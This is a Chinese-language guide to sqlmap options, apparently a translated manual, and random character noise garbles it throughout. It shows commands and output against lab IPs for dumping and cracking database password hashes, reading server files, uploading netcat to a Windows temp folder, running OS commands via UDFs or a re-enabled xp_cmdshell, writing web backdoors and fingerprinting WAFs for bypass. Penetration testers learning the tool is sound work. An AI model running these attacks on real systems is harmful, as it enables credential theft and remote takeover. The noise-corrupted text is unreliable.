' [9 A0 ]# l' u( J6 ]& ~2 E参数:--users * J( b; F% m! e0 ] p : S2 i( M {& T* N当前用户有权限读取包含所有用户的表的权限时,就可以列出所有管理用户。& e3 j6 p. Y/ U9 _$ j) y- K
列出并破解数据库用户的hash/ p! B$ {) \# i+ a
! R+ n: T3 n6 s% {" T4 ^+ H6 f
参数:--passwords _+ X, u4 c8 A( s8 {
: t7 a9 O f* `, H当前用户有权限读取包含用户密码的彪的权限时,sqlmap会现列举出用户,然后列出hash,并尝试破解。$ F; S* |6 g* [! a; _/ |# D! D
$ k" Q4 N3 d# L* z% j. `
例子: 9 ?- X4 ~! o" ?) f3 K 0 w6 Q/ {/ G) E7 _) m1 x( |$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1 9 W# D- `! K8 y[...]. U1 Q8 ]* o! E
back-end DBMS: PostgreSQL8 C o' i9 D! N9 \$ c7 |3 R
[hh:mm:38] [INFO] fetching database users password hashes9 f1 B K4 ?( s- e
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y + u' n! p* U. Y: {[hh:mm:42] [INFO] using hash method: 'postgres_passwd') w1 o7 n9 N; z$ _, C1 E
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt] / c& K7 B" N- b* k[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'' a5 i% H, z2 q
do you want to use common password suffixes? (slow!) [y/N] n5 j6 O' y5 U j: d- b
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)6 Q4 }$ N2 R. v" i# C/ j& a
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser' ) b* n1 y" {# S& }" I7 \/ B! I[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'2 v- `0 x8 r0 D0 {* i$ W, s
database management system users password hashes:
postgres [1]: 0 y g/ B j# p% m% A7 a) G password hash: md5d7d880f96044b72d0bba108ace96d1e41 q- o6 u6 e; E; h3 c( U5 O
clear-text password: testpass
testuser [1]: $ I8 ~. W7 _$ m D" i password hash: md599e5ea7a6f7c3269995cba3927fd0093 4 ?+ w( y, V. `% N9 `& p clear-text password: testpass: H! R9 A, a7 T# ]( C
% r% e3 A$ C6 u3 d可以看到sqlmap不仅勒出数据库的用户跟密码,同时也识别出是PostgreSQL数据库,并询问用户是否采用字典爆破的方式进行破解,这个爆破已经支持Oracle和Microsoft SQL Server。3 l7 y) `! _7 b% U! E
' i" p, \/ F6 C
也可以提供-U参数来指定爆破哪个用户的hash。 * W5 T8 E r& }5 M列出数据库管理员权限7 E5 }; n k$ r' C
0 E0 ^4 F4 h, g h
参数:--privileges $ _: t# ]0 T: C4 \, C4 A ' }; p) ^6 Y/ k, {* C2 n7 C当前用户有权限读取包含所有用户的表的权限时,很可能列举出每个用户的权限,sqlmap将会告诉你哪个是数据库的超级管理员。也可以用-U参数指定你想看哪个用户的权限。$ w% N+ c- q+ ^( @3 z! g4 T- l
列出数据库管理员角色; Y% z6 `1 O, I& G! @6 U( j
+ |* `4 `" ]- X& V: k可以在一下三种情况下使用: 6 y- L. e6 b( D8 r: S5 K+ Q) T$ A! A$ X. C! I$ Y6 o6 S* U
-C后跟着用逗号分割的列名,将会在所有数据库表中搜索指定的列名。 . K! }/ G1 P7 u9 I-T后跟着用逗号分割的表名,将会在所有数据库中搜索指定的表名 ) E8 r! x+ ^; y- L-D后跟着用逗号分割的库名,将会在所有数据库中搜索指定的库名。 . [7 K& s& X( q% u0 V! a: Z/ v4 J9 j$ O' `6 y0 r
运行自定义的SQL语句- \9 t/ t& ~6 n; D1 G$ i
; R2 m" U4 e, c y( V& U6 z
参数:--sql-query,--sql-shell: t. m9 U; K H* s0 q$ Y
& N8 |, h9 v) @6 B+ T% Lsqlmap会自动检测确定使用哪种SQL注入技术,如何插入检索语句。 $ X# m4 d) n, m; ? 5 H2 I, Z1 k d5 c如果是SELECT查询语句,sqlap将会输出结果。如果是通过SQL注入执行其他语句,需要测试是否支持多语句执行SQL语句。 5 \3 _, P: ]3 H- h P ( Y& j( E' S% l0 @2 ~列举一个Mircrosoft SQL Server 2000的例子:/ S9 J& A, b1 f) p4 ^
1 h2 A8 Y+ Y c8 _; x8 I
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1 7 e& ~+ G# i7 `. f) N. J9 w) {4 ?% h7 u
[...] 3 g" G2 o* e1 @# H `' |' ^# j[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo'' # g" Z! j+ v x; X9 ]% E9 E[hh:mm:14] [INFO] retrieved: foo ! u5 S: {3 G x( g3 \) lSELECT 'foo': 'foo'8 L9 ?# S6 ^) O; G: s- o
7 h- O1 @ @2 V3 L5 S# ?$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2+ |# L8 g' Z$ J& J
: \& J9 h( S7 v6 p4 D! X- f' `
[...] ! b1 }9 }2 m# p- K* M; ^[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar'' V8 y y! E$ ?3 i. I[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into 5 d! F3 D# P8 H
distinct queries to be able to retrieve the output even if we are going blind ( H$ U9 N, O1 T( ~6 l[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), . Z t8 O/ p: Q, a3 q5 [0 I) t
(CHAR(32)))' J( G& U9 j2 J8 C3 [
[hh:mm:50] [INFO] retrieved: foo / M+ n8 I$ ?% I[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds + b" i: |& q. ^/ Q% U& T( ^[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), 1 E6 q6 e1 V; e9 v1 J7 b5 B
(CHAR(32))) 4 `5 k M+ L8 [% c- H9 [: y+ h[hh:mm:50] [INFO] retrieved: bar " X# `1 ^ [. L2 m/ M# f* M0 Z[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds 5 z/ x. q' y6 n9 J0 {* o; w( L# ySELECT 'foo', 'bar': 'foo, bar' , x) T' `( c. d 0 h& w0 j+ c1 Q7 S1 v% V+ c0 s2 ~爆破 & F k1 h4 E, A! u! ?暴力破解表名/ Q) V: F* f( h* S# T4 L
* G' @/ e( p5 G4 ^. `9 e参数:--common-tables/ Z- u9 P, V u
5 t7 X9 y* h- d
当使用--tables无法获取到数据库的表时,可以使用此参数。 $ m. }, c8 {/ |& \; G) `2 B* T 0 X1 Z, b) L3 v# W1 g- E$ O通常是如下情况: : q9 U! I1 D9 ^2 F0 h% R$ |( K5 v8 d3 k3 Z8 u7 u; \
1、MySQL数据库版本小于5.0,没有information_schema表。6 [6 y. K3 q- M% @- @; w
2、数据库是Microssoft Access,系统表MSysObjects是不可读的(默认)。 " J% H1 ^ o7 |& {( x* h3、当前用户没有权限读取系统中保存数据结构的表的权限。' l2 s- K5 x* u1 [
3 G8 r% G0 h! z$ G# y
暴力破解的表在txt/common-tables.txt文件中,你可以自己添加。 ; m$ N+ s- Q' {) ~& Y |; n/ J. l% g* u: B
列举一个MySQL 4.1的例子: c/ O0 e. D: t. w7 y. o- z
& w/ B; V/ e! K3 n' N. n: e$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner % |/ x! T8 n& i' p$ p1 \6 ^0 p$ E6 X0 ]+ x" ^& r" P' b* A
[...] 4 |+ a6 ]. |. u$ r: p: T[hh:mm:39] [INFO] testing MySQL7 Y8 m$ Q- W. t! O" ~1 V! @
[hh:mm:39] [INFO] confirming MySQL4 E0 p0 L, _) [" `- m: u7 q
[hh:mm:40] [INFO] the back-end DBMS is MySQL 3 i: q8 ~- P* k& h) v# U3 m. m @8 Z[hh:mm:40] [INFO] fetching banner* i& Q9 `. h8 {0 J% |( K+ c
web server operating system: Windows& B$ ]; i& i3 I' N" F4 C
web application technology: PHP 5.3.1, Apache 2.2.14' Q. C) w% ^* ?+ X
back-end DBMS operating system: Windows6 w% T4 U% y0 K3 J# s ~2 H, D! S
back-end DBMS: MySQL < 5.0.01 b: j3 f, K3 W4 r& O) r8 n4 u
banner: '4.1.21-community-nt'# L/ L; u( T0 y
& B6 \$ t$ U/ \; K a[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'5 g* l1 t7 s d. R1 M4 \% d. l
[hh:mm:40] [INFO] adding words used on web page to the check list C6 I0 A( ^4 L W5 h5 b
please enter number of threads? [Enter for 1 (current)] 8 % L* g' l+ e( Z0 ]4 I[hh:mm:43] [INFO] retrieved: users / B8 w% u; D7 H* j4 } X( ~% W+ K % n0 l. @1 O9 X) n+ nDatabase: testdb - X* i8 B- ]8 `6 e6 `: _! t[1 table]$ E8 K9 ?% o& M! q; A
+-------+ : ?% w" J' P3 C% O| users |/ F# Y0 w/ z ]+ X/ m
+-------+# ?& o g" c- `+ ^) B
8 Q8 b0 S' C% k3 K8 f暴力破解列名# L8 d6 J8 K1 Y+ G; k6 u
6 |2 f, D5 E K2 [) N4 `
参数:--common-columns $ @1 Q3 c& O; v+ q3 G; n3 j+ g" c% m4 p. [/ w$ ?* d1 R( x
与暴力破解表名一样,暴力跑的列名在txt/common-columns.txt中。+ L$ \. m+ k7 r' w. d$ q9 Z
用户自定义函数注入* U! |; }3 U( X* c! y$ v
6 j! o% ^# [- m2 g' h/ V! f. U
参数:--udf-inject,--shared-lib3 Y- J& A) M$ Q2 x6 c
: R) Q3 j4 }0 U6 s& S/ `/ S3 ]' U
你可以通过编译MySQL注入你自定义的函数(UDFs)或PostgreSQL在windows中共享库,DLL,或者Linux/Unix中共享对象,sqlmap将会问你一些问题,上传到服务器数据库自定义函数,然后根据你的选择执行他们,当你注入完成后,sqlmap将会移除它们。 % K. c( W1 { M; L; Q! V2 g0 T/ _系统文件操作: h, s/ e8 r3 { ~" c
从数据库服务器中读取文件 % X1 j$ c# S8 Z 6 v( {" C3 Z. W& }* w9 u5 F# x: u参数:--file-read/ _) l& a+ _8 P E1 o, @
" [$ D6 E3 u. X. J
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。 + y0 [0 R0 }5 R+ s - u( ^- T c( e1 E! @/ P0 Z列举一个Microsoft SQL Server 2005的例子: * b0 x0 U8 b3 r+ L' v+ q( `% U% q2 D1 @; P" b
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \; s- o/ D! q, r6 o# V
--file-read "C:/example.exe" -v 1; i+ l" s/ F& s$ t8 b+ y! z
" r: V% o; a; \* \
[...] $ m6 h0 i* l( w1 o: }, T[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server ! L1 S7 z" h/ x* Z+ r9 Iweb server operating system: Windows 2000 ( I/ N2 B. \$ |+ {web application technology: ASP.NET, Microsoft IIS 6.0, ASP 5 k* `9 E! }( R: x; }, y% qback-end DBMS: Microsoft SQL Server 2005$ q. ~+ r+ m9 o- S4 D0 L" g4 E/ {
' d( A v. c; _5 J9 Z$ _/ P/ q
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'( p) n2 L( G! f' A, Y
[hh:mm:50] [INFO] the SQL query provided returns 3 entries 3 z ^+ b9 b0 X6 v1 G' lC:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'. _, U+ |' l; C* g: r/ c
[...]+ r3 j2 d# A* r" r
8 i4 g9 \1 e$ \# b/ S
$ ls -l output/192.168.136.129/files/C__example.exe $ W/ t2 k! Q8 V; ^-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe 6 F! r0 W! {5 F: t* k - D/ | x/ P' r5 L! ~5 l& A$ file output/192.168.136.129/files/C__example.exe * O& u8 x6 T& m; ?. {$ c2 Q
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel _7 G- t8 A0 ^* o* T6 t
80386 32-bit . \7 ~! c3 }1 u0 P1 ~/ g - _# c5 T% G1 z; v5 h把文件上传到数据库服务器中7 Z1 B! M- J/ F( S4 U
- {, a/ B& e/ Y3 ]- ~# P当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。 " O! w8 h; B% ]; }# o% L2 `1 n& O 6 e4 a: a8 {7 `! t! @列举一个MySQL的例子: 1 Q K5 m1 Q3 [3 ~2 y% Y4 [2 g5 \
$ file /software/nc.exe.packed ) f8 R6 Z$ X' D& o5 i, i
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit % L6 u2 K2 L- M. E4 |3 e. O + n( R# d+ P- e# i. i) ^: `$ k$ ls -l /software/nc.exe.packed . i# R7 ]9 a1 f$ x-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed4 f1 d& i* y: |0 ~* D: Y
2 V: a2 \- U% C2 u {$ Z
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \ ( q9 I7 T/ Q, I& Y& r"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 18 X& l7 i* M! ]$ V" ]
/ S# Q+ S& s: X$ V! T
[...]) _' _4 p" N0 }* Y
[hh:mm:29] [INFO] the back-end DBMS is MySQL3 [/ s+ |2 s! M& F0 N+ o2 g/ t
web server operating system: Windows 2003 or 2008 ; q9 |/ H2 U, nweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727' ~3 U1 C) z& {1 Q3 l( J6 h
back-end DBMS: MySQL >= 5.0.0 R0 l/ L; N% C# y/ u
* B2 V7 B- v( c5 g, n# V) I7 n. R: t[...] " ?- \& a3 e* a1 e6 D. {+ T( u/ ]do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 1 ?: G g3 b/ G- ]5 _9 H0 Wwritten on the back-end DBMS file system? [Y/n] y, I$ j5 f0 n- ^1 Y
[hh:mm:52] [INFO] retrieved: 31744 2 L6 t( }: S9 b: }8 z[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, " V D, c/ n% P* U
same size as the local file '/software/nc.exe.packed'( p: X* r0 }. V: d% x! G7 i& C
- _- ~% ?, q; b9 N1 c/ ?
运行任意操作系统命令+ ^, j- s0 R; C
2 I2 x$ g4 Z; n- c& k" p; Z" k参数:--os-cmd,--os-shell t8 }+ X: p0 l# O8 k. A& s7 L: D. o# t% o8 @2 p7 }
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。! C/ p6 M( ~3 J2 K0 J$ F! n
5 v7 d5 T) J4 E- n
在MySQL、PostgreSQL,sqlmap上传一个二进制库,包含用户自定义的函数,sys_exec()和sys_eval()。 2 r% F7 n8 e K: N: p) p" \- Q# X3 a; ?( N0 F6 ?* c
那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server,sqlmap将会使用xp_cmdshell存储过程,如果被禁(在Microsoft SQL Server 2005及以上版本默认禁制),sqlmap会重新启用它,如果不存在,会自动创建。 $ M' a' s4 @3 k+ r1 z# j7 k$ X : K0 b. J$ u2 o2 E c列举一个PostgreSQL的例子:: ?- U7 k: D8 P" Y3 s( C
, j1 D8 C. m0 b' h: L
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \ , F. o' G0 M+ ~7 n; T--os-cmd id -v 1. j# F9 X) _( v; j: p8 n
) [* o! m' Z, M7 h1 K7 h[...]* J5 G% L$ ~" {: y
web application technology: PHP 5.2.6, Apache 2.2.9 2 S8 A9 _5 s( C8 K0 }- c: c; X( Lback-end DBMS: PostgreSQL 9 t/ Q E; S# z7 n[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system , H& Q6 q$ V; r[hh:mm:12] [INFO] the back-end DBMS operating system is Linux6 J5 ?+ K" Q- g" a
[hh:mm:12] [INFO] testing if current user is DBA ! s5 f+ ~( V9 ^ R9 l5 g[hh:mm:12] [INFO] detecting back-end DBMS version from its banner 8 C6 B# E# E/ {% `. g[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist/ x6 C4 s- W! ^3 @/ o
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist - Q, c, h2 }" E P9 m[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file 6 K/ V5 |3 |5 \9 ^/ H[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file 5 b* w+ y' \" P: [: x9 xdo you want to retrieve the command standard output? [Y/n/a] y8 Q, i$ L7 H/ m) t7 M" J
command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'+ v4 u1 N; y; A8 c
$ u8 }+ y" }! f( ]" j[hh:mm:19] [INFO] cleaning up the database management system) f+ t3 X& b# p( [" m& h
do you want to remove UDF 'sys_eval'? [Y/n] y* _! Y% \1 \" ]' ?4 a
do you want to remove UDF 'sys_exec'? [Y/n] y, G! N7 h) R6 q4 x! p6 U% ]
[hh:mm:23] [INFO] database management system cleanup finished 4 D/ }5 ?* G# D; x[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can ' m6 [/ q4 X) T1 _) [6 @8 O. K
only be deleted manually$ s# U* k/ G' {3 P1 N$ s, Z
t* ]+ t' V% r$ G用--os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。 " i# t' @. p. s # n9 F+ l& d) s; O/ g当不能执行多语句的时候(比如php或者asp的后端数据库为MySQL时),仍然可能使用INTO OUTFILE写进可写目录,来创建一个web后门。支持的语言: # v0 I8 H& T( l$ @4 ]$ ~! |9 I# A6 I8 H$ y2 E
1、ASP( t% s/ H7 w3 d9 g; ~; ?; M
2、ASP.NET3 j$ A. N! V1 c
3、JSP+ H1 ~4 U& a) \& y! e9 [
4、PHP- a4 B2 y5 @( r; w5 K- X' U6 N
& p2 d& D- S: T+ o" C参数:-t# c' D+ _2 ^9 L& X3 B
' }$ h7 G, ^4 M
这个参数需要跟一个文本文件,sqlmap会把HTTP(S)请求与响应的日志保存到那里。- `# r3 C, _+ [5 F
非交互模式 ! { e+ O8 c. r+ F0 O, j. t7 |+ G
参数:--batch 5 _) g9 z/ w# X: d0 r. A( L , ?1 _# E5 `' U7 k- ^) Q$ }9 E用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。4 k1 O, C1 B) |# m* g; [! v
强制使用字符编码9 ?- X3 @ a" c0 a C( g/ i
% m& ^0 t n: E) Z: e
参数:--charset' e, d0 j; K# w$ q
) W- |8 F& ]: z; [不使用sqlmap自动识别的(如HTTP头中的Content-Type)字符编码,强制指定字符编码如: - x2 z% h I4 B& ~! p2 _. j6 H' U, w9 B2 j1 \8 M
--charset=GBK, B+ H3 d% d% f3 p! [0 d; h
/ c& q. c7 Z& O/ ]
爬行网站URL ( m" V+ [+ ^ d 4 ^; g; i& c& T- n1 g5 c8 A+ q参数:--crawl3 T4 m; K6 z5 E( ~9 \& n
# c7 n' _$ _' O$ Bsqlmap可以收集潜在的可能存在漏洞的连接,后面跟的参数是爬行的深度。 / K. z+ N0 z. ^9 {; f * u+ r( ]/ T0 ~! ^; A, G; ~例子:; H0 |8 {. b& U
/ e7 a3 @3 c# s& Z9 e8 u. h8 l$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3 % a- O, L* D4 `' e; ][...]/ C7 L8 d+ B" H! d' l( G" s$ m) p
[xx:xx:53] [INFO] starting crawler' X7 d% m* L" _3 A5 J5 S
[xx:xx:53] [INFO] searching for links with depth 1 ; z& Z8 @$ A" q- O4 p2 m. t[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while& ]0 K8 P6 b- S8 C8 @2 L
[xx:xx:53] [INFO] searching for links with depth 2 . c# [9 } h1 h$ @ r[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'& m/ b8 R( M! \0 Z$ X$ b
[xx:xx:00] [INFO] 42/56 links visited (75%)4 `" U) \/ {6 d# H; u5 Q- h5 o
[...]& f0 S; g3 K8 ?5 A4 j
/ u9 a3 v; j2 a1 W/ O# K* Q7 a
规定输出到CSV中的分隔符% `# p9 v: I% x& S# @
! C/ P$ w* T% f7 ~ t3 E5 G
参数:--csv-del- G6 `6 p8 e* M
) ~* I, _* q3 ^, r9 q' \当dump保存为CSV格式时(--dump-format=CSV),需要一个分隔符默认是逗号,用户也可以改为别的 如:* y2 s1 T( H8 y5 I! w4 r: g" o
! h; X1 s2 t. R4 f! a2 i$ X" M
--csv-del=";". p6 {+ s% Z' b+ w& @4 n
1 a* v+ C, o" x- _/ ^/ S _
DBMS身份验证: r5 `1 x. i- b& W1 Y0 Z, j
$ V6 \' t* ^! N7 X& V% w参数:--dbms-cred 5 P* l! P: M& x( x. |, o8 u; s1 X( y& [$ D, _% A J
某些时候当前用户的权限不够,做某些操作会失败,如果知道高权限用户的密码,可以使用此参数,有的数据库有专门的运行机制,可以切换用户如Microsoft SQL Server的OPENROWSET函数 L9 N( ~ B( v" Y- R! A3 Y) g2 v
定义dump数据的格式4 D1 B" Q1 e8 T8 | y* ~
x. I3 E, n, {: U. O! U
参数:--dump-format 5 a2 P' m6 l5 ?3 B9 n2 t# \$ ^; R8 o$ }# m( d, d0 K6 F
输出的格式可定义为:CSV,HTML,SQLITE3 q; R8 r: Z. J- v. U
预估完成时间/ J- ^0 M9 l6 \
' l# j9 `9 y+ u1 Q9 o# u h" O8 H+ R参数:--eta . v( o" P6 d! P7 A( y : ?6 N2 c0 f; ?可以计算注入数据的剩余时间。 & X ^9 D @8 K& W$ @% L" v* @+ C' P$ r7 ^
例如Oracle的布尔型盲注: ; U- ^6 X& [) {* r( Q; a5 H, S% ` `$ v1 e, G9 J; {6 q( Z% u8 X
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta& T" Q) P3 S2 y" _5 n
; D5 v9 e9 d, \9 e% F- J[...]$ m4 p% f% H7 ]: x, p1 i% S
[hh:mm:01] [INFO] the back-end DBMS is Oracle 6 ]) v, r& Y7 T4 u# O7 D[hh:mm:01] [INFO] fetching banner+ K2 A' {; z9 X% o: B' E7 N
[hh:mm:01] [INFO] retrieving the length of query output + B( s% L4 c3 L7 Q r5 c) a5 L[hh:mm:01] [INFO] retrieved: 64 . q6 ~* i9 f6 h2 v17% [========> ] 11/64 ETA 00:19 9 w( N3 \" o" [* M2 p8 K; o7 I/ h2 C1 \1 B9 b* S
然后:! c4 |& l$ E! K ] O) p) D9 Z
- v# O* c" e! e1 z( r: ?100% [===================================================] 64/642 g/ c' b# t# u5 U
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod9 {- r6 U& Y- R
+ s- u9 f, S5 J
web application technology: PHP 5.2.6, Apache 2.2.9 . M# F! y% Y7 w( w! F' N+ A4 kback-end DBMS: Oracle5 V# C6 @1 o p- { F `
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'5 M. o* }- Y" H( `' P5 g. a
$ ?3 N! P% i. x h. O! Ssqlmap先输出长度,预计完成时间,显示百分比,输出字符4 P/ h: ]7 y; Z( U+ A+ [8 h
刷新session文件 0 F0 ]' H: q1 j* n Q 7 H9 {0 h; C; R' l k3 J! |) _参数:--flush-session2 f, E* v: I3 H0 \" _
; T' ]: }! `) n2 }如果不想用之前缓存这个目标的session文件,可以使用这个参数。 会清空之前的session,重新测试该目标。# N' M% S: C' c4 L
自动获取form表单测试$ [$ m0 M) O _/ R2 [
" m) _- ]- X8 m3 t F
参数:--forms0 T; m7 _8 Y0 d" N$ S
# B) G3 p( O) J# q
如果你想对一个页面的form表单中的参数测试,可以使用-r参数读取请求文件,或者通过--data参数测试。 但是当使用--forms参数时,sqlmap会自动从-u中的url获取页面中的表单进行测试。! W' x/ B: F. h+ y
忽略在会话文件中存储的查询结果: K) n. e: `5 V- Z
# N$ M8 e5 L7 y' r7 k参数:--fresh-queries3 ?0 n/ Y; m! x8 M+ t
$ s0 n0 N5 P$ Z9 U
忽略session文件保存的查询,重新查询。+ u+ E1 m+ {% |5 r* Z/ G0 W- G" _
使用DBMS的hex函数 9 V& w1 U9 l8 K: f4 r$ V+ _ " X$ s% |3 W2 r+ ?参数:--hex & c6 N, y L# \; T& k! y5 t 5 O9 w" g0 {: ]1 Z2 a$ i: z9 J有时候字符编码的问题,可能导致数据丢失,可以使用hex函数来避免:+ G1 g, L* M$ m
& w, N' l) c" A
针对PostgreSQL例子: _3 d w( D+ m& @0 o
* J2 \# N1 @- q
$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors ; w m% e* O( Q5 @: @9 k4 g7 w/ _1 p; }- [9 i- @" B
[...] 6 O& H4 L2 S7 Y% c( |[xx:xx:14] [INFO] fetching banner 2 K. I6 G& s3 P8 U: G[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC) . f" k. w2 W( S W[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'+ U. K) _$ M4 L/ I* H
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by & c+ C& v6 A7 b1 @5 y* M* IGCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2 + G. {; _9 `2 S6 r3 ~5 G8 I[...]% ~% C M; [) F/ f2 ?
& w# `" v; L) R; ^- F自定义输出的路径+ d; z* {! Q. v" c. H
S. ?( Y3 {7 B4 O9 u参数:--output-dir% s2 E1 Z% g' H9 u
# l! b" q9 n. |sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:--output-dir=/tmp, a' O4 X3 Q; {
从响应中获取DBMS的错误信息( ~ C1 [" d0 \! G5 e4 h/ @4 S
/ n4 k( h0 S: }! w/ n, p2 G6 `9 @
参数:--parse-errors | ~: P+ H$ [. f) y: O* a
) c8 V" k. j s5 L& ]; v
有时目标没有关闭DBMS的报错,当数据库语句错误时,会输出错误语句,用词参数可以会显出错误信息。 3 M0 \3 p& ?0 {! q 1 X1 c9 P; J, e) }, \$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors& l, I. Z; X6 J6 _) N' V% q# I) V
[...]7 {3 R7 W) @, X- v( T) p
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test $ R7 @9 H8 M) j1 q+ G" [[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) ' C: k2 U: A; O4 E/ y[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.& ?8 `/ Y* C4 p: b$ E
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' - X8 }( D6 r" |- X. {+ b5 [[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)2 q" C4 E9 Y8 \
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list. a; ?: F$ k5 R4 I<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'9 M0 p7 C8 M+ l' o, ^4 M
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) 4 C+ W8 U0 H% T& @ J[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.8 F+ ]3 h, u# g& G& f/ c! p
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>': b" b* z" u4 Q
[11:12:17] [INFO] target URL appears to have 3 columns in query # o) m! X+ @+ N9 t0 D" O( Z2 y& ~[...]- A2 H# @, v8 _! E
. [" `+ k5 y! ]( A: n- C* G参数:--identify-waf . w* q& L! Y9 Y+ t. r% T " p7 I+ d' G, Isqlmap可以尝试找出WAF/IPS/IDS保护,方便用户做出绕过方式。目前大约支持30种产品的识别。 ' p% l9 Z* Y, T& f, K' i% e# f/ V% m8 \2 C
例如对一个受到ModSecurity WAF保护的MySQL例子: " l; _ V( q6 Q2 ~0 F6 C/ ] ( L4 l1 L, V1 A$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3 6 V! [7 R" M7 O# {% X2 z[...]3 y( D, l+ V# G/ {
[xx:xx:23] [INFO] testing connection to the target URL* w7 G* ^/ k' n* R) T' _. H, ^
